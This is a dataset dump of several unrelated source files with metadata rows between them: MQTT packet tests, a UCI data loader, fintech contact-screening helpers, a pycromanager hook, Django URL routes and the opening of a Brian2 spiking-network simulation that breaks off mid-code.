    """Remaining lengths 2097152..268435455 use four bytes."""
    assert mqttpacket.encode_remainining_length(2097152) == b'\x80\x80\x80\x01'
    assert mqttpacket.encode_remainining_length(268435455) == b'\xff\xff\xff\x7f'
def test_disconnect():
    """DISCONNECT is the fixed two-byte packet 0xE0 0x00."""
    packet = mqttpacket.disconnect()
    assert packet == b'\xe0\x00'
def test_publish():
    """A retained QoS-0 PUBLISH wraps a JSON payload correctly."""
    payload_str = json.dumps({u'test': u'test'}).encode('utf-8')
    publish = mqttpacket.publish(u'test', False, 0, True, payload_str)
    print(binascii.hexlify(publish))
    assert six.indexbytes(publish, 0) == 49  # PUBLISH type + retain bit
    assert six.indexbytes(publish, 1) == 22  # remaining length
    assert publish == binascii.unhexlify(
        b'31160004746573747b2274657374223a202274657374227d'
    )
def test_publish_nonzero_qos_requires_packetid():
    """QoS 1 and QoS 2 PUBLISH packets must carry a packet id."""
    for qos in (1, 2):
        with pytest.raises(ValueError):
            mqttpacket.publish(
                u'test',
                False,
                qos,
                True,
                u'foo'.encode('utf-8')
            )
def test_publish_qos_1():
    """A retained QoS-1 PUBLISH embeds the packet id after the topic."""
    publish = mqttpacket.publish(
        u'test', False, 1, True, u'foo'.encode('utf-8'), packet_id=255)
    assert publish == binascii.unhexlify(b'330b00047465737400ff666f6f')
def test_publish_qos_2():
    """A non-retained QoS-2 PUBLISH encodes fixed-header flags 0x34."""
    publish = mqttpacket.publish(
        u'test', False, 2, False, u'foo'.encode('utf-8'), packet_id=256)
    assert publish == binascii.unhexlify(b'340b0004746573740100666f6f')
def test_publish_dup():
    """The DUP bit is set in the fixed header when requested."""
    publish = mqttpacket.publish(
        u'test', True, 1, False, u'foo'.encode('utf-8'), packet_id=256)
    assert publish == binascii.unhexlify(b'3a0b0004746573740100666f6f')
def test_publish_dup_requires_qos():
    """DUP may only be combined with QoS 1 or 2, never QoS 0."""
    with pytest.raises(ValueError):
        mqttpacket.publish(
            u'test',
            True,
            0,
            False,
            u'foo'.encode('utf-8'),
            packet_id=256
        )
def test_publish_payload_requires_bytes():
    """A text payload is rejected; PUBLISH payloads must be bytes."""
    with pytest.raises(TypeError):
        mqttpacket.publish(
            u'test',
            False,
            0,
            False,
            u'foo'
        )
def test_pingreq():
    """PINGREQ is the fixed two-byte packet 0xC0 0x00."""
    assert mqttpacket.pingreq() == b'\xc0\x00'
def test_unsubscribe():
    """UNSUBSCRIBE encodes the packet id followed by each topic filter."""
    packet = mqttpacket.unsubscribe(257, [u'a/b', u'c/d'])
    assert packet[:1] == b'\xa1'
    assert six.indexbytes(packet, 1) == 12  # remaining length
    assert packet[2:4] == b'\x01\x01'       # packet id 257, big-endian
    assert packet[4:6] == b'\x00\x03'       # first filter length
    assert packet[6:9] == u'a/b'.encode('utf-8')
    assert packet[9:11] == b'\x00\x03'      # second filter length
    assert packet[11:] == u'c/d'.encode('utf-8')
def test_unsubscribe_requires_one():
    """An empty topic list is rejected."""
    with pytest.raises(ValueError):
        mqttpacket.unsubscribe(123, [])
| 24.606061 | 77 | 0.604475 |
import binascii
import json
import six
import pytest
import mqttpacket.v311 as mqttpacket
def test_connect_basic():
expect = binascii.unhexlify(
b'101000044d5154540402003c000474657374'
)
packet = mqttpacket.connect(u'test')
assert packet == expect
assert isinstance(packet, bytes)
assert len(packet) == 18
assert six.indexbytes(packet, 0) == 16
assert six.indexbytes(packet, 9) == 0x02
assert packet[14:].decode('utf-8') == u'test'
def test_will_requirements():
with pytest.raises(ValueError):
mqttpacket.ConnectSpec(
will_topic=u'foo',
)
with pytest.raises(ValueError):
mqttpacket.ConnectSpec(
will_message=u'my message',
)
def test_valid_will():
cs = mqttpacket.ConnectSpec(
will_topic=u'my_will_topic',
will_message=u'my_will_message',
will_qos=1,
)
wt = u'my_will_topic'
wm = u'my_will_message'
assert cs.will_topic == wt
assert cs.will_message == wm
assert cs.flags() == 0x0e
assert len(cs.payload()) == 32
cs = mqttpacket.ConnectSpec(
will_topic=u'wt2',
will_message=u'wm2',
will_qos=2,
)
assert cs.will_topic == u'wt2'
assert cs.will_message == u'wm2'
assert cs.flags() == 0x16
def test_default_spec():
cs = mqttpacket.ConnectSpec()
assert not cs.payload()
assert cs.flags() == 0x02
def test_will_must_be_unicode():
with pytest.raises(TypeError):
mqttpacket.ConnectSpec(
will_topic=b'foo',
will_message=u'bar'
)
with pytest.raises(TypeError):
mqttpacket.ConnectSpec(
will_topic=u'biz',
will_message=b'baz'
)
def test_will_qos_values():
with pytest.raises(ValueError):
mqttpacket.ConnectSpec(
will_topic=u'biz',
will_message=u'baz',
will_qos=3
)
mqttpacket.ConnectSpec(
will_topic=u'my_will_topic',
will_message=u'my_will_message',
will_qos=1
)
mqttpacket.ConnectSpec(
will_topic=u'my_will_topic',
will_message=u'my_will_message',
will_qos=2
)
def test_connect_with_spec():
cs = mqttpacket.ConnectSpec(
will_topic=u'my_will_topic',
will_message=u'my_will_message',
will_qos=1,
)
packet = mqttpacket.connect(u'test', connect_spec=cs)
assert isinstance(packet, bytes)
assert len(packet) == 50
assert six.indexbytes(packet, 0) == 16
assert six.indexbytes(packet, 9) == 0x0e
assert packet[14:18].decode('utf-8') == u'test'
def test_build_subscription_multiple():
specs = [
mqttpacket.SubscriptionSpec(u'a/b', 0x01),
mqttpacket.SubscriptionSpec(u'c/d', 0x02),
]
packet = mqttpacket.subscribe(10, specs)
assert isinstance(packet, bytes)
assert six.indexbytes(packet, 0) == 0x82
assert six.indexbytes(packet, 1) == 14
assert six.indexbytes(packet, 2) << 8 | six.indexbytes(packet, 3) == 10
assert six.indexbytes(packet, 4) << 8 | six.indexbytes(packet, 5) == 3
assert packet[6:9].decode('utf-8') == u'a/b'
assert six.indexbytes(packet, 9) == 0x01
assert six.indexbytes(packet, 10) << 8 | six.indexbytes(packet, 11) == 3
assert packet[12:15].decode('utf-8') == u'c/d'
assert six.indexbytes(packet, 15) == 0x02
def test_build_subscription_single():
specs = [
mqttpacket.SubscriptionSpec(u'test/1', 0x00),
]
packet = mqttpacket.subscribe(10, specs)
assert isinstance(packet, bytes)
assert six.indexbytes(packet, 0) == 0x82
assert six.indexbytes(packet, 1) == 11
assert six.indexbytes(packet, 2) << 8 | six.indexbytes(packet, 3) == 10
assert six.indexbytes(packet, 4) << 8 | six.indexbytes(packet, 5) == 6
assert packet[6:12].decode('utf-8') == u'test/1'
assert six.indexbytes(packet, 12) == 0x00
def test_subscription_spec_multibyte():
topic = u'super€'
spec = mqttpacket.SubscriptionSpec(
topic,
0
)
assert spec.remaining_len() == 11
assert spec.to_bytes() == b'\x00\x08\x73\x75\x70\x65\x72\xe2\x82\xac\x00'
def test_encode_single_byte_length():
r = mqttpacket.encode_remainining_length(127)
assert r == b'\x7f'
r = mqttpacket.encode_remainining_length(0)
assert r == b'\x00'
def test_encode_two_byte_length():
r = mqttpacket.encode_remainining_length(128)
assert r == b'\x80\x01'
r = mqttpacket.encode_remainining_length(16383)
assert r == b'\xff\x7f'
def test_encode_three_byte_length():
r = mqttpacket.encode_remainining_length(16384)
assert r == b'\x80\x80\x01'
r = mqttpacket.encode_remainining_length(2097151)
assert r == b'\xff\xff\x7f'
def test_encode_four_byte_length():
r = mqttpacket.encode_remainining_length(2097152)
assert r == b'\x80\x80\x80\x01'
r = mqttpacket.encode_remainining_length(268435455)
assert r == b'\xff\xff\xff\x7f'
def test_disconnect():
assert mqttpacket.disconnect() == b'\xe0\x00'
def test_publish():
payload = {u'test': u'test'}
payload_str = json.dumps(payload).encode('utf-8')
publish = mqttpacket.publish(
u'test',
False,
0,
True,
payload_str
)
print(binascii.hexlify(publish))
assert six.indexbytes(publish, 0) == 49
assert six.indexbytes(publish, 1) == 22
expect = binascii.unhexlify(
b'31160004746573747b2274657374223a202274657374227d'
)
assert publish == expect
def test_publish_nonzero_qos_requires_packetid():
with pytest.raises(ValueError):
mqttpacket.publish(
u'test',
False,
1,
True,
u'foo'.encode('utf-8')
)
with pytest.raises(ValueError):
mqttpacket.publish(
u'test',
False,
2,
True,
u'foo'.encode('utf-8')
)
def test_publish_qos_1():
publish = mqttpacket.publish(
u'test',
False,
1,
True,
u'foo'.encode('utf-8'),
packet_id=255
)
expect = binascii.unhexlify(
b'330b00047465737400ff666f6f'
)
assert publish == expect
def test_publish_qos_2():
publish = mqttpacket.publish(
u'test',
False,
2,
False,
u'foo'.encode('utf-8'),
packet_id=256
)
expect = binascii.unhexlify(
b'340b0004746573740100666f6f'
)
assert publish == expect
def test_publish_dup():
publish = mqttpacket.publish(
u'test',
True,
1,
False,
u'foo'.encode('utf-8'),
packet_id=256
)
expect = binascii.unhexlify(
b'3a0b0004746573740100666f6f'
)
assert publish == expect
def test_publish_dup_requires_qos():
with pytest.raises(ValueError):
mqttpacket.publish(
u'test',
True,
0,
False,
u'foo'.encode('utf-8'),
packet_id=256
)
def test_publish_payload_requires_bytes():
with pytest.raises(TypeError):
mqttpacket.publish(
u'test',
False,
0,
False,
u'foo'
)
def test_pingreq():
ping = mqttpacket.pingreq()
assert ping == b'\xc0\x00'
def test_unsubscribe():
msg = mqttpacket.unsubscribe(257, [u'a/b', u'c/d'])
assert msg[:1] == b'\xa1'
assert six.indexbytes(msg, 1) == 12
assert msg[2:4] == b'\x01\x01'
assert msg[4:6] == b'\x00\x03'
assert msg[6:9] == u'a/b'.encode('utf-8')
assert msg[9:11] == b'\x00\x03'
assert msg[11:] == u'c/d'.encode('utf-8')
def test_unsubscribe_requires_one():
with pytest.raises(ValueError):
mqttpacket.unsubscribe(123, [])
| true | true |
1c304b2e446caeea09fe4f3238f2f4808c2013b4 | 1,980 | py | Python | src/bnn_priors/bnn_priors/data/UCI/uci.py | activatedgeek/uncertainty-da-bayesian-classification | a270fb095f4790dea15327145897d09d0ba9c80b | [
"Apache-2.0"
] | 31 | 2021-02-16T09:35:03.000Z | 2022-03-31T17:18:54.000Z | src/bnn_priors/bnn_priors/data/UCI/uci.py | activatedgeek/understanding-bayesian-classification | a270fb095f4790dea15327145897d09d0ba9c80b | [
"Apache-2.0"
] | 1 | 2021-05-10T15:25:48.000Z | 2021-05-10T15:25:48.000Z | src/bnn_priors/bnn_priors/data/UCI/uci.py | activatedgeek/understanding-bayesian-classification | a270fb095f4790dea15327145897d09d0ba9c80b | [
"Apache-2.0"
] | 4 | 2021-02-21T03:38:00.000Z | 2021-12-24T15:13:29.000Z | import os
import torch as t
import numpy as np
from torch.utils.data import TensorDataset
from bnn_priors.data import Dataset
__all__ = ('UCI',)
class UCI:
    """
    Loader for a UCI regression dataset split, exposing both raw and
    normalized views.

    The usage is:
    ```
    uci = UCIDataset("protein", 3)
    ```
    e.g. normalized training dataset:
    ```
    uci.norm.train
    ```
    """
    def __init__(self, dataset, split, dtype='float32', device="cpu"):
        # Locate the dataset directory shipped next to this module:
        # <pkg>/<dataset>/ containing data.txt and index files.
        _ROOT = os.path.abspath(os.path.dirname(__file__))
        dataset_dir = f'{_ROOT}/{dataset}/'
        data = np.loadtxt(f'{dataset_dir}/data.txt').astype(getattr(np, dtype))
        # Column indices selecting features vs. the regression target.
        index_features = np.loadtxt(f'{dataset_dir}/index_features.txt')
        index_target = np.loadtxt(f'{dataset_dir}/index_target.txt')
        X_unnorm = t.from_numpy(data[:, index_features.astype(int)])
        # Keep the target 2-D: a single-column (N, 1) tensor.
        y_unnorm = t.from_numpy(data[:, index_target.astype(int):index_target.astype(int)+1])

        # split into train and test (precomputed per-split index files)
        index_train = np.loadtxt(f'{dataset_dir}/index_train_{split}.txt').astype(int)
        index_test = np.loadtxt(f'{dataset_dir}/index_test_{split}.txt').astype(int)

        # record unnormalized dataset
        self.unnorm = Dataset(X_unnorm, y_unnorm, index_train, index_test, device)

        # compute normalization constants based on training set
        self.X_std = t.std(self.unnorm.train_X, 0)
        self.X_std[self.X_std == 0] = 1. # ensure we don't divide by zero
        self.X_mean = t.mean(self.unnorm.train_X, 0)

        self.y_mean = t.mean(self.unnorm.train_y)
        self.y_std = t.std(self.unnorm.train_y)

        # Normalize the *whole* dataset with training-set statistics so the
        # test split sees the same transform.
        X_norm = (self.unnorm.X - self.X_mean)/self.X_std
        y_norm = (self.unnorm.y - self.y_mean)/self.y_std
        self.norm = Dataset(X_norm, y_norm, index_train, index_test, device)

        # Convenience shape metadata (over the full dataset, not just train).
        self.num_train_set = self.unnorm.X.shape[0]
        self.in_shape   = self.unnorm.X.shape[1:]
        self.out_shape  = self.unnorm.y.shape[1:]

    def denormalize_y(self, y):
        # Map a normalized prediction back to the original target scale.
        return self.y_std * y + self.y_mean
| 33 | 93 | 0.644949 | import os
import torch as t
import numpy as np
from torch.utils.data import TensorDataset
from bnn_priors.data import Dataset
__all__ = ('UCI',)
class UCI:
def __init__(self, dataset, split, dtype='float32', device="cpu"):
_ROOT = os.path.abspath(os.path.dirname(__file__))
dataset_dir = f'{_ROOT}/{dataset}/'
data = np.loadtxt(f'{dataset_dir}/data.txt').astype(getattr(np, dtype))
index_features = np.loadtxt(f'{dataset_dir}/index_features.txt')
index_target = np.loadtxt(f'{dataset_dir}/index_target.txt')
X_unnorm = t.from_numpy(data[:, index_features.astype(int)])
y_unnorm = t.from_numpy(data[:, index_target.astype(int):index_target.astype(int)+1])
index_train = np.loadtxt(f'{dataset_dir}/index_train_{split}.txt').astype(int)
index_test = np.loadtxt(f'{dataset_dir}/index_test_{split}.txt').astype(int)
self.unnorm = Dataset(X_unnorm, y_unnorm, index_train, index_test, device)
self.X_std = t.std(self.unnorm.train_X, 0)
self.X_std[self.X_std == 0] = 1.
self.X_mean = t.mean(self.unnorm.train_X, 0)
self.y_mean = t.mean(self.unnorm.train_y)
self.y_std = t.std(self.unnorm.train_y)
X_norm = (self.unnorm.X - self.X_mean)/self.X_std
y_norm = (self.unnorm.y - self.y_mean)/self.y_std
self.norm = Dataset(X_norm, y_norm, index_train, index_test, device)
self.num_train_set = self.unnorm.X.shape[0]
self.in_shape = self.unnorm.X.shape[1:]
self.out_shape = self.unnorm.y.shape[1:]
def denormalize_y(self, y):
return self.y_std * y + self.y_mean
| true | true |
1c304cfde2e518bcc04299a8cd1038af217984de | 3,939 | py | Python | python_data/fintech/basic_utils.py | younhapan/ystdoc | a3fee3c48fc4e35b26b70ab7d9f123be059a4a7a | [
"Apache-2.0"
] | null | null | null | python_data/fintech/basic_utils.py | younhapan/ystdoc | a3fee3c48fc4e35b26b70ab7d9f123be059a4a7a | [
"Apache-2.0"
] | null | null | null | python_data/fintech/basic_utils.py | younhapan/ystdoc | a3fee3c48fc4e35b26b70ab7d9f123be059a4a7a | [
"Apache-2.0"
] | null | null | null | # https://github.com/orgs/tmrwh/teams/fintech/repositories
# anubis_application_service anubis_decision_service anubis_result_service anubis_status_service: 这四个是决策引擎和业务系统交互附属包
# ice_core: 决策引擎
# feature_lib: 特征计算逻辑库
# feature_bank: 离线刷特征工具
# tethys: 数据获取特征框架
# themis: 特征计算调度框架
# lambda_core: 对外请求数据接口整合
# amon: 离线模型训练工具
# maat: 在线模型加载工具
# daixiaomi_common: 公共服务,打印日志,消费队列,异常获取
# miracle: 监控,数据分析工具
# 主要看ice_core feature_lib amon maat miracle
#!/usr/bin/env python
# encoding: utf-8
import sys
import os
import traceback
import socket
import time
import urllib
import json
import datetime
import re
def get_good_contacts(contacts):
    """Clean a contact list by dropping noisy entries:

    1. contacts whose name is all digits,
    2. contacts with short phone numbers (6 characters or fewer),
    3. contacts (grouped by name) having 8 or more phone numbers.
    """
    by_name = {}
    for contact in contacts:
        if contact.name.isdigit():
            continue
        if len(contact.phone) <= 6:
            continue
        by_name.setdefault(contact.name, []).append(contact)

    good_list = []
    for entries in by_name.values():
        if len(entries) < 8:
            good_list.extend(entries)
    return good_list
def pos_in_name(name):
    """Return True if POS, POSS or POSJI appears as a standalone Latin word
    in *name* (but not inside longer words such as "possibility").

    NOTE(review): uses ``str.decode`` — this is Python 2 code; under
    Python 3 the argument would have to be ``bytes``. Confirm runtime.
    """
    name = name.replace(' ','')
    name = name.decode('utf8')
    # Match any single CJK character.
    pat = u"[\u4e00-\u9fa5]{1}"
    # Replace every Chinese character with a space so only Latin runs remain.
    tmp = re.sub(pat,' ',name)
    # Trim and collapse consecutive spaces into single separators.
    words = ' '.join(tmp.split())
    if words == '':
        return False
    words = words.split(' ')
    for w in words:
        if w.upper() == 'POS' or w.upper()=='POSS' or w.upper()=='POSJI':
            return True
    return False
def has_number(name):
    """Return True when *name* contains an ASCII digit or a Chinese numeral."""
    if re.search(r'\d', name):
        return True
    num_str = ['一','二','三','四','五','六','七','八','九','十']
    return any(s in name for s in num_str)
def name_is_tonghang(name0, suspicious_name_list):
    """Return (hit, reason): whether contact name *name0* matches an
    industry-peer ("tonghang") keyword from *suspicious_name_list*.

    NOTE(review): relies on Python 2 string semantics — ``encode('utf8')``
    followed by ``str in`` checks; under Python 3 this would mix bytes and
    str. Confirm runtime before porting.
    """
    # Normalize to UTF-8 encoded form (Python 2 text handling).
    try:
        name = name0.encode('utf8')
    except:
        name = name0
    # Names containing a digit combined with loan/credit-related keywords.
    if has_number(name):
        for sus_name in suspicious_name_list['tonghang']['name_with_number']:
            if sus_name in name:
                return True, '数字+'+sus_name
    # POS / POS-machine sellers.
    if pos_in_name(name):
        return True, 'POS或POSS'
    for sus in suspicious_name_list['tonghang']['name']:
        if isinstance(sus,str):
            # A single suspicious keyword.
            if sus in name:
                return True, sus
        elif isinstance(sus,list):
            # A multi-keyword rule: every keyword must appear.
            flag = 0
            for s in sus:
                if s in name:
                    flag += 1
            if flag == len(sus):
                return True, '+'.join(sus)
    return False, '称呼'+name+'未命中同行名'
def name_is_suspicious(name0, suspicious_name_list):
    """Return (hit, level, reason): whether contact name *name0* matches a
    suspicious keyword; *level* is the matched severity key (or -1 on miss).

    NOTE(review): Python 2 string semantics, see ``name_is_tonghang``.
    """
    # Normalize to UTF-8 encoded form (Python 2 text handling).
    try:
        name = name0.encode('utf8')
    except:
        name = name0
    # Scan integer-keyed severity levels in ascending order.
    levels = [level for level in suspicious_name_list.keys() if isinstance(level,int)]
    levels.sort()
    for level in levels:
        for sus in suspicious_name_list[level]['name']:
            if isinstance(sus,str):
                # A single suspicious keyword.
                if sus in name:
                    return True, level, sus
            elif isinstance(sus,list):
                # A multi-keyword rule: every keyword must appear.
                flag = 0
                for s in sus:
                    if s in name:
                        flag += 1
                if flag == len(sus):
                    return True, level, '+'.join(sus)
        # Names containing a digit combined with level-specific keywords.
        if has_number(name):
            for sus_name in suspicious_name_list[level]['name_with_number']:
                if sus_name in name:
                    return True, level, '数字+'+sus_name
    return False, -1, '称呼'+name+'未命中同行名'
import sys
import os
import traceback
import socket
import time
import urllib
import json
import datetime
import re
def get_good_contacts(contacts):
num_map = {}
good_contacts = []
for c in contacts:
if c.name.isdigit():
continue
if len(c.phone) <= 6:
continue
if c.name in num_map:
num_map[c.name].append(c)
else:
num_map[c.name] = [c]
for k,v in num_map.items():
if len(v) >= 8:
continue
else:
good_contacts.append(v)
good_list = []
for i in good_contacts:
for j in i:
good_list.append(j)
return good_list
def pos_in_name(name):
name = name.replace(' ','')
name = name.decode('utf8')
pat = u"[\u4e00-\u9fa5]{1}"
tmp = re.sub(pat,' ',name)
words = ' '.join(tmp.split())
if words == '':
return False
words = words.split(' ')
for w in words:
if w.upper() == 'POS' or w.upper()=='POSS' or w.upper()=='POSJI':
return True
return False
def has_number(name):
if bool(re.search(r'\d',name)):
return True
num_str = ['一','二','三','四','五','六','七','八','九','十']
for s in num_str:
if s in name:
return True
return False
def name_is_tonghang(name0, suspicious_name_list):
try:
name = name0.encode('utf8')
except:
name = name0
if has_number(name):
for sus_name in suspicious_name_list['tonghang']['name_with_number']:
if sus_name in name:
return True, '数字+'+sus_name
if pos_in_name(name):
return True, 'POS或POSS'
for sus in suspicious_name_list['tonghang']['name']:
if isinstance(sus,str):
if sus in name:
return True, sus
elif isinstance(sus,list):
flag = 0
for s in sus:
if s in name:
flag += 1
if flag == len(sus):
return True, '+'.join(sus)
return False, '称呼'+name+'未命中同行名'
def name_is_suspicious(name0, suspicious_name_list):
try:
name = name0.encode('utf8')
except:
name = name0
levels = [level for level in suspicious_name_list.keys() if isinstance(level,int)]
levels.sort()
for level in levels:
for sus in suspicious_name_list[level]['name']:
if isinstance(sus,str):
if sus in name:
return True, level, sus
elif isinstance(sus,list):
flag = 0
for s in sus:
if s in name:
flag += 1
if flag == len(sus):
return True, level, '+'.join(sus)
if has_number(name):
for sus_name in suspicious_name_list[level]['name_with_number']:
if sus_name in name:
return True, level, '数字+'+sus_name
return False, -1, '称呼'+name+'未命中同行名' | true | true |
1c304eca5d99b8ec648c996cba5a70c52485321d | 285 | py | Python | test/magellan_focus_surface.py | ilyasdc/pycro-manager | 5f0153e8a90104eb8715348c6eb22c4d8fdee477 | [
"BSD-3-Clause"
] | 88 | 2020-05-08T16:54:24.000Z | 2022-03-09T01:03:04.000Z | test/magellan_focus_surface.py | ilyasdc/pycro-manager | 5f0153e8a90104eb8715348c6eb22c4d8fdee477 | [
"BSD-3-Clause"
] | 200 | 2020-05-15T13:21:44.000Z | 2022-03-31T17:55:23.000Z | test/magellan_focus_surface.py | ilyasdc/pycro-manager | 5f0153e8a90104eb8715348c6eb22c4d8fdee477 | [
"BSD-3-Clause"
] | 31 | 2020-04-30T03:22:50.000Z | 2022-03-19T18:00:32.000Z | from pycromanager import Bridge, Acquisition
import numpy as np
def hook_fn(event):
    """Post-hardware hook: read the stage coordinates from the event (demo
    of accessing event fields) and pass the event through unchanged so the
    acquisition proceeds."""
    coordinates = np.array([event[axis] for axis in ("x", "y", "z")])  # noqa: F841
    return event
# magellan example
# Launch the Micro-Magellan acquisition (GUI acquisition index 0) with the
# post-hardware hook attached, then block until it completes.
acq = Acquisition(magellan_acq_index=0, post_hardware_hook_fn=hook_fn)
acq.await_completion()
| 19 | 70 | 0.740351 | from pycromanager import Bridge, Acquisition
import numpy as np
def hook_fn(event):
coordinates = np.array([event["x"], event["y"], event["z"]])
return event
acq = Acquisition(magellan_acq_index=0, post_hardware_hook_fn=hook_fn)
acq.await_completion()
| true | true |
1c304f0ffe61e37c164dc36801f09525d665b7ab | 588 | py | Python | site/gnss_iot/urls.py | paulohenriquerosa/gnss-iot-server | 6e7ff39bc83276d6ad86121083eb48d134d00f9d | [
"MIT"
] | null | null | null | site/gnss_iot/urls.py | paulohenriquerosa/gnss-iot-server | 6e7ff39bc83276d6ad86121083eb48d134d00f9d | [
"MIT"
] | null | null | null | site/gnss_iot/urls.py | paulohenriquerosa/gnss-iot-server | 6e7ff39bc83276d6ad86121083eb48d134d00f9d | [
"MIT"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
    # Landing page.
    path('', views.index, name='index'),
    # Profile page for a specific user.
    path('profile/<int:user_id>/', views.profile, name='profile'),
    # Device list and CRUD operations under the profile section.
    path('profile/devices/', views.devices, name='devices'),
    path('profile/new_device/', views.new_device, name='new_device'),
    path('profile/delete_device/<int:device_id>/', views.delete_device, name='delete_device'),
    path('profile/edit_device/<int:device_id>/', views.edit_device, name='edit_device'),
    path('profile/detail_device/<int:device_id>/', views.detail_device, name='detail_device'),
]
| 39.2 | 94 | 0.705782 |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('profile/<int:user_id>/', views.profile, name='profile'),
path('profile/devices/', views.devices, name='devices'),
path('profile/new_device/', views.new_device, name='new_device'),
path('profile/delete_device/<int:device_id>/', views.delete_device, name='delete_device'),
path('profile/edit_device/<int:device_id>/', views.edit_device, name='edit_device'),
path('profile/detail_device/<int:device_id>/', views.detail_device, name='detail_device'),
]
| true | true |
1c304f488108df86cc25e7b49439df93f5c38397 | 51,772 | py | Python | retrain.py | Math-568-project/interneuron_circuits_plasticity | ded04f8da5d315d2ec18950179efa41ed4813960 | [
"MIT"
] | null | null | null | retrain.py | Math-568-project/interneuron_circuits_plasticity | ded04f8da5d315d2ec18950179efa41ed4813960 | [
"MIT"
] | null | null | null | retrain.py | Math-568-project/interneuron_circuits_plasticity | ded04f8da5d315d2ec18950179efa41ed4813960 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import numpy as np
import pickle
from brian2 import *
from brian2tools import *
from analyse_experiment import *
from plot_Spikingmodel import *
from utils import *
# Directory where simulation outputs are written.
RESULTS_DIR = './results'
# Orientation the circuit is tuned/rewarded for — presumably an index into
# the stimulus orientations; TODO confirm (index vs. radians).
TUNED_ORI = 1
def run_network(params):
# get parameters
p = Struct(**params)
# simulation
total_simtime = p.nonplasticwarmup_simtime + p.warmup_simtime + p.reward_simtime + p.noreward_simtime + p.noSSTPV_simtime + p.after_simtime
total_warmup_simtime = p.nonplasticwarmup_simtime + p.warmup_simtime
stim_time = p.stim_time
input_time = p.input_time
seed(p.seed)
# neurons
N4 = p.N4
L4_rate = p.L4_rate
gl = p.gl
el = p.el
er = p.er
vt = p.vt
memc = p.memc
tau_gaba = p.tau_gaba
tau_ampa = p.tau_ampa
tau = p.tau_noise
sigma = p.sigma
# connections
w_PYR_PV = p.w_PYR_PV
w_PYR_VIP = p.w_PYR_VIP
w_PYR_SOM = p.w_PYR_SOM
w_FFPYR = p.w_FFPYR
w_FFPV = p.w_FFPV
w_FFSOM = p.w_FFSOM
w_TDVIP = p.w_TDVIP
w_L4PYR = p.w_L4PYR
c_gap = p.c_gap
tau_spikelet = p.tau_spikelet
# plasticity
tau_stdp = p.tau_stdp
tau_istdp = p.tau_istdp
relbound = p.relbound
gmax_SSTPV = p.gmax_SSTPV
dApre = p.dApre * nS
dApost = -dApre * tau_stdp / tau_stdp * 1.05
dApre_i = p.dApre_i * nS
dApost_i = -dApre_i * tau_istdp / tau_istdp * 1.05
# untuned Layer 4 neurons:
eqs_FF = '''
rate = L4_rate: Hz
'''
FF = NeuronGroup(1,
eqs_FF,
threshold='rand() < rate*dt',
method='euler',
name='FF')
# tuned Layer 4 neurons:*((t<(stim_end_time+10*ms)))
eqs_layer4 = '''
rate = clip(cos(orientation*2 - selectivity*2), 0, inf)*L4_rate : Hz
stim_rate = rate*int(t<stim_end_time): Hz
gap_rate = (L4_rate*2/5)*int(t>=stim_end_time) : Hz
selectivity : 1 # preferred orientation
orientation : 1 (shared) # orientation of the current stimulus
stim_start_time : second (shared) # start time of the current stimulus
stim_end_time : second (shared) # end time of the current stimulus
'''
layer4 = NeuronGroup(N4,
eqs_layer4,
threshold='rand() < stim_rate *dt',
method='euler',
name='layer4')
gapfiller = NeuronGroup(N4,
'''gap_rate : Hz (linked)''',
threshold='rand() < gap_rate *dt',
method='euler',
name='gapfiller')
gapfiller.gap_rate = linked_var(layer4, 'gap_rate')
# selectivities for N4 = 4 neurons: 0, 45, 90, and 135 degrees in radians
# for each L4 neuron, selectivity between 0 and pi
layer4.selectivity = '(i%N4)/(1.0*N4)*pi'
# Choose one of the four preferred oriented bars every 70ms (discrete stimulus)
# idx = int(floor(rand()*N4)) for N4=4 samples uniformly from [0,1,2,3]
# orientation = (idx%4)/(1.0*4)*pi
runner_code = '''
orientation = ((int(floor(rand()*N4)))%4)/(1.0*4)*pi
stim_start_time = t
stim_end_time = t + stim_time
'''
layer4.run_regularly(runner_code, dt=p.input_time, when='start')
# L23 neurons
eqs_neurons = '''
dv/dt=(-gl*(v-el)+Isyn+Igap+Ispikelet)/memc + sigma * (2 / tau)**.5 *xi: volt (unless refractory)
Isyn = IsynE + IsynI : amp
IsynE = -g_ampa*v : amp
IsynI = -g_gaba*(v-er) : amp
Igap: amp
dIspikelet/dt = -Ispikelet/tau_spikelet : amp
dg_ampa/dt = -g_ampa/tau_ampa : siemens
dg_gaba/dt = -g_gaba/tau_gaba : siemens
'''
# Excitatory synapses
STDP_E = '''
w : siemens
gmax : siemens
dApre/dt = -Apre / tau_stdp : siemens (event-driven)
dApost/dt = -Apost / tau_stdp : siemens (event-driven)
plastic : boolean (shared)
'''
# STDP at excitatory synapses
on_pre_STDP_E = '''g_ampa += w
Apre += dApre
w = clip(w + plastic*Apost, 0*nS, gmax)'''
on_post_STDP_E = '''Apost += dApost
w = clip(w + plastic*Apre, 0*nS, gmax)'''
# anti-Hebbian STDP at excitatory synapses
on_pre_antiHebb_IE = '''g_ampa += w
Apre += dApre
w = clip(w - plastic*Apost, 0*nS, gmax)'''
on_post_antiHebb_IE = '''Apost += dApost
w = clip(w - plastic*Apre, 0*nS, gmax)'''
# define neurons
exc_neurons = NeuronGroup(p.NPYR,
model=eqs_neurons,
threshold='v > vt',
reset='v=el',
refractory=2 * ms,
method='euler')
inh_neurons = NeuronGroup(p.NSOM + p.NVIP + p.NPV,
model=eqs_neurons,
threshold='v > vt',
reset='v=el',
refractory=2 * ms,
method='euler')
PYR = exc_neurons[:p.NPYR]
SOM = inh_neurons[:p.NSOM]
VIP = inh_neurons[p.NSOM:int(p.NSOM + p.NVIP)]
PV = inh_neurons[int(p.NSOM + p.NVIP):]
# Feedforward synaptic connections from L4 to L23
feedforward1 = Synapses(layer4[0:1],
PYR[0:100],
'''w = w_L4PYR: siemens''',
on_pre='g_ampa += w',
name='feedforward1')
feedforward1.connect(p=1)
feedforward2 = Synapses(layer4[1:2],
PYR[100:200],
on_pre='g_ampa += w_L4PYR',
name='feedforward2')
feedforward2.connect(p=1)
feedforward3 = Synapses(layer4[2:3],
PYR[200:300],
on_pre='g_ampa += w_L4PYR',
name='feedforward3')
feedforward3.connect(p=1)
feedforward4 = Synapses(layer4[3:4],
PYR[300:400],
on_pre='g_ampa += w_L4PYR',
name='feedforward4')
feedforward4.connect(p=1)
feedforwardgap1 = Synapses(gapfiller[0:1],
PYR[0:100],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap1')
feedforwardgap1.connect(p=1)
